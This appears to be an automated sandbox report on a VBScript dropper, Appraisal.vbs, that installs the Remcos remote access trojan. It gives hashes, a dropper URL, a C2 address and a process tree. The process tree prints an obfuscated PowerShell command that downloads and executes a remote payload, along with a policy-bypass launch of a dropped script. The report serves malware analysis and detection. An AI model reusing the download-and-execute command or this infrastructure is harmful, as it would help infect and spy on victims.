Overview

overview

10

Static

static

Appraisal.vbs

windows7_x64

10

Appraisal.vbs

windows10_x64

10

Analysis

  • max time kernel
    148s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    25-04-2021 15:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Appraisal.vbs

  • Size

    713B

  • MD5

    374872083b769268ef5be044031e72cf

  • SHA1

    ccb15dd8642387523121e8c67bb8fa41b2b2f966

  • SHA256

    5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27

  • SHA512

    5b97e908e39d61decb10a0b2bdf9d94043d899b86052fcedd598d87a7a610d977b526c5176c91b7bdecacb1a1eb3f39ce3bab9547c253e2b4e17c837dc50de58

Score
10/10
remcosrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia601403.us.archive.org/17/items/all_20210425_202104/ALL.TXT

Extracted

Family

remcos

C2

185.19.85.168:1723

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Appraisal.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1268
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I`E`X((n`e`W`-Obj`E`c`T(('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://ia601403.us.archive.org/17/items/all_20210425_202104/ALL.TXT'))))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1152
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:528
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          #cmd
          4⤵
            PID:588
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            #cmd
            4⤵
            • Suspicious use of SetWindowsHookEx
            PID:1676

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
      MD5

      f10fba79ab99030cf901b7b11357c981

      SHA1

      3ffcf0f76debf43c1b9a6a0ce9e1809065a25319

      SHA256

      82cf2481160d842f5ff3d743eefb70cad1d45520645497503cac396f46275ce4

      SHA512

      e887178e7af5f794d5103ffecb69c93ad720772de7f303ab7028738dc7643b88bb5456be1f77c80bac6e5b0793282c55c8083262132b8b617e63a63eb630671b

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      MD5

      d9c23a22c27d490508a4d0584dbfcaa0

      SHA1

      2b4555324624595bfde09c84e4db5b90715b6551

      SHA256

      ae98456e3487a35f0851004d3dcca33722713702c5e529ccd99f2ae18dbb91a6

      SHA512

      6f426d4a98ba8e01148ecb00dcb787a598ee778630d33a80cedad143e0bcfd44df3d6ba96ef714784dbb0d8671e1dac7fd538c4eac4ae36509fce17a3f8052b5

      Download Submit
    • C:\Users\Public\ Microsoft.ps1
      MD5

      ab9f802581d1bbbcafb0cb1f9a3a002f

      SHA1

      a53f6e8d357edd39060bd4842e448f2c84571b86

      SHA256

      36fa91c5bfae97b2c9945b055384297afaf148f2becd50e0ce270276ca472855

      SHA512

      3732785a36fa3c7a8a51969b6fe31da69f19a8d68cd8789236806d81a2bc2d70007b2459d4b739790fd7592c954d9b186e048ddec34c1d3ff6a5c5810cf21621

      Download Submit
    • memory/528-70-0x0000000000000000-mapping.dmp
      Download
    • memory/528-82-0x0000000002620000-0x000000000263F000-memory.dmp
      Filesize

      124KB

      Download
    • memory/528-86-0x00000000024A0000-0x00000000024A1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/528-75-0x000000001AB70000-0x000000001AB72000-memory.dmp
      Filesize

      8KB

      Download
    • memory/528-76-0x000000001AB74000-0x000000001AB76000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1152-62-0x0000000002200000-0x0000000002201000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1152-68-0x000000001B6A0000-0x000000001B6A1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1152-65-0x000000001ABD0000-0x000000001ABD2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1152-63-0x000000001AC50000-0x000000001AC51000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1152-67-0x0000000002570000-0x0000000002571000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1152-66-0x000000001ABD4000-0x000000001ABD6000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1152-69-0x000000001C7A0000-0x000000001C7A1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1152-60-0x0000000000000000-mapping.dmp
      Download
    • memory/1152-64-0x00000000024B0000-0x00000000024B1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1268-59-0x000007FEFB991000-0x000007FEFB993000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1676-83-0x0000000000400000-0x0000000000478000-memory.dmp
      Filesize

      480KB

      Download
    • memory/1676-84-0x000000000042EEEF-mapping.dmp
      Download
    • memory/1676-85-0x0000000075591000-0x0000000075593000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1676-87-0x0000000000400000-0x0000000000478000-memory.dmp
      Filesize

      480KB

      Download